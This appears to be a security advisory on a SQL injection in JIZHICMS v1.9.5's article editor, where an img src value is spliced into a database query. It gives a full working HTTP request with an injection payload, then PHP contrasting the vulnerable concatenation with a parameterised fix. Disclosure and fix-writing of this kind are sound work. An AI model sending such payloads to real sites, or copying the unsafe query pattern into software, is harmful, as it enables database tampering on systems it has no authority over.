SQL Injection vulnerability in JIZHICMS v1.9.5 via the add or edit article function
In the article module of JIZHICMS v1.9.5, when no picture is set at the time an article is published, JIZHICMS takes the first img tag in the body and uses it as the article picture. During this extraction the parameters of the img tag are neither checked nor filtered, so the attribute value is spliced into the database query and causes SQL injection.
Reproduction steps:
Open the article editing page, submit the form, and then modify the captured request.
Set litpic and body to the following values and send the request:
litpic=''
body=<img+src%3d"http%3a//a.com/a.jpg',+title+%3d+version()+,+orders+%3d+'1"/>
Payload (full request):
POST /admin.php/Article/editarticle.html HTTP/1.1
Host: jizhicms.test
Content-Length: 237
Accept: */*
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://jizhicms.test
Referer: http://jizhicms.test/admin.php/Article/editarticle/id/33.html
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=pjhk5trh72fq0eeobrn81bmba4
Connection: close
go=1&id=33&title=test&tid=2&seo_title=test&hits=0&keywords=&litpic=&file=&description=&orders=0&tags=&isshow=1&addtime=2021-06-27+22%3A14%3A16&target=&ownurl=&body=<img+src%3d"http%3a//a.com/a.jpg',+title+%3d+version()+,+orders+%3d+'1"/>
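The following PHP is an added illustration of the bug class described above and of the corresponding fix; it is not JIZHICMS's code. The table name `article`, the `litpic` column, the extraction regex and the in-memory SQLite table are assumptions, and the sample bodies are constructed from the URL-decoded payload shown in the request.

```php
<?php
// Added illustration of the bug class in this advisory; not JIZHICMS's code.
// Table name "article", column "litpic" and the regex are assumptions.

// Pulls the src of the first <img> in the body. Capturing everything up to
// the next double quote is what lets a single quote inside the attribute
// survive into the extracted value.
function firstImgSrc(string $body): ?string
{
    if (preg_match('/<img[^>]*\bsrc\s*=\s*"([^"]*)"/i', $body, $m) === 1) {
        return $m[1];
    }
    return null;
}

// Vulnerable pattern: the extracted value is concatenated straight into the
// UPDATE. The statement is returned rather than executed so the reader can
// see how the quote inside src closes the literal and the remainder of the
// attribute is parsed as additional SET clauses.
function buildVulnerableUpdate(int $id, string $body): string
{
    $litpic = firstImgSrc($body) ?? '';
    return "UPDATE article SET litpic = '" . $litpic . "' WHERE id = " . $id;
}

// Hardened: accept only an http(s) URL or a site-relative path (defence in
// depth), and bind the value as a parameter so the database never parses it
// as SQL. The prepared statement is the fix; the allow-list is extra.
function safeLitpic(string $body): string
{
    $src = firstImgSrc($body);
    if ($src === null) {
        return '';
    }
    $scheme = parse_url($src, PHP_URL_SCHEME);
    $isHttpUrl = filter_var($src, FILTER_VALIDATE_URL) !== false
        && in_array($scheme, ['http', 'https'], true);
    $isRelativePath = preg_match('#^/[A-Za-z0-9_./-]+$#', $src) === 1;
    return ($isHttpUrl || $isRelativePath) ? $src : '';
}

function hardenedUpdate(PDO $db, int $id, string $body): void
{
    $stmt = $db->prepare('UPDATE article SET litpic = :litpic WHERE id = :id');
    $stmt->execute([':litpic' => safeLitpic($body), ':id' => $id]);
}

// Demo against an in-memory SQLite table with constructed sample data.
$db = new PDO('sqlite::memory:', null, null, [PDO::ATTR_ERRMODE => PDO::ERRMODE_EXCEPTION]);
$db->exec('CREATE TABLE article (id INTEGER PRIMARY KEY, title TEXT, litpic TEXT, orders INTEGER)');
$db->exec("INSERT INTO article VALUES (33, 'test', '', 0)");

// Constructed bodies: a normal article and the decoded payload from the request above.
$benign    = '<p>hello</p><img src="http://a.com/a.jpg"/>';
$malicious = '<img src="http://a.com/a.jpg\', title = version() , orders = \'1"/>';

// Shows the spliced statement the vulnerable path would send to the database.
echo buildVulnerableUpdate(33, $malicious), PHP_EOL;

// Hardened path: the benign URL is stored, the malicious value is rejected.
hardenedUpdate($db, 33, $benign);
echo 'after benign body:    ', $db->query('SELECT litpic FROM article WHERE id = 33')->fetchColumn(), PHP_EOL;

hardenedUpdate($db, 33, $malicious);
echo 'after malicious body: ', var_export($db->query('SELECT litpic FROM article WHERE id = 33')->fetchColumn(), true), PHP_EOL;
```

Running this prints the single UPDATE statement that the concatenation builds from the malicious body, in which `title` and `orders` have become assignable columns, and then shows the hardened path storing the benign URL and storing an empty string for the malicious body. The essential change is the bound parameter in `hardenedUpdate`: with it the whole attribute value is treated as data, so even a value that slips past the allow-list cannot alter the statement.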